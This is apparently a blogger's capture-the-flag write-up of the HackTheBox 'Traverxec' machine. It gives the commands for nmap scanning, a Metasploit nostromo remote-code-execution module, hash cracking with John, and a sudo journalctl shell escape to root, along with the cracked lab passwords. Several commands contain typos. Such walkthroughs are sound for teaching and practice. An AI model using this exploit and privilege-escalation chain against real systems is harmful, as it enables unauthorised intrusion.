Traverxec Hackthebox Writeup

Traverxec

#About

Hello everyone, this is the write-up for traverxec box on hackthebox . It was a really easy box, which was more ctf type. So let’s get started

# Basic Info

• Name: Traverxec
• IP: 10.10.10.165
• Level: Easy
• Box: Linux

# Enumeration

• We perform an nmap scan on the machine and get the following results
  nmap -sC -sV -oN nmap.txt -v 10.10.10.165

• On port 80 we see the service ‘nostromo 1.9.6’ running.
• OpenSSH running on port 22 is latest version and hence no exploits are available.
• We run a all port scan in the background till we find examine the nostromo service.
  nmap -sC -sV -v -p- -oN allports.txt 10.10.10.165

# Foothold (Web-shell)

• Let’s look for an exploit of the notsromo service on the box
  searchsploit nostromo
• We found an exploit, now we open metasploit to run it.
  sudo msfconsole

• search nostromo
use exploit/multi/http/nostromo_code_exec
• We tweak the exploit options as follows
  set rhosts 10.10.10.165
set lhost tun0
set srvhost tun0
• Run the exploit
  exploit
• We get a shell..!!

• To upgrade this shell we run the following command
  python3 -c ‘import pty;pty.spaws(“/usr/bin/sh”)’
export TERM=xterm
• Now we get a proper shell on the box…!!

# Exploitation(User)

• Now looking around the box we find the directory ‘/var/nostromo/conf/’
• We cat the files present in it and gather some intresting information

• We find a ‘.htpasswd’ which is a hash. We copy it to our system.
• We crack it using john
  john — wordlist=/usr/share/wordlists/rockyou.txt .htpasswd
• The cracked hash reveals the password : Nowonly4me
• We try to login using these credentials but it fails, let’s look somewhere else.
• Closely examining the ‘/var/nostromo/conf/nhttpd.conf’ file we see that there is a public_www directory listed.
  cd /home/david/public_www
• We look at the contents of the directory
  ls -laR

• I read the documentation of nostromo and found that files present in the home directory of the user can be accessed by web browser by simply putting a ~ before the username
• Then we open the following url in a browser
  ‘http://10.10.10.165/~david/public_www/private-file-storage/backup-ssh-identity-files.tgz’

• We are prompted for a password, we enter the password that we previously cracked(Nowonly4me) and we get the file!
• Looking into the contents of the home directory, we find a ssh private key!!
• First we convert this to john type file
  ssh2john id_rsa > hash.hash
• Then we crack this using john and get the password ‘hunter’
  john — wordlists=/usr/share/wordlists/rockyou.txt hash.hash

• Finally we get an ssh password! We login using this private key
  ssh -i id_rsa davis@10.10.10.165
• We get the user shell..and find the user.txt file
  cat ~/user.txt

#Exploitation(Root)

• Looking in the home directory of user david, we see a bin folder.
• Inside it there are two files, a banner and a shell script.
• We closely look at the shell script and deduce that user david is allowed to run /usr/bin/journalctl as sudo..!!
• We go to gtfobins to look for privesc using the command(journalctl) that we can run as sudo.

• So we run the command
  /usr/bin/sudo /usr/bin/journalctl -n5 unostromo.service
• Then we enter
  !/bin/sh
• And we get root..!!!
  cat /root/root.txt

# Concepts we learned

• Searching for exploits using searchsploit.
• Working of nostromo service.
• We discovered about this awesome webiste GTFObins.
• How to use ‘less’ to get a root shell if its running as root.
• How to crack hashes using john.

# Conclusion

This was my way to root the box, if there’s a better way to pwn this, feel free to respond :)
Have a great day, Happy Hacking.!!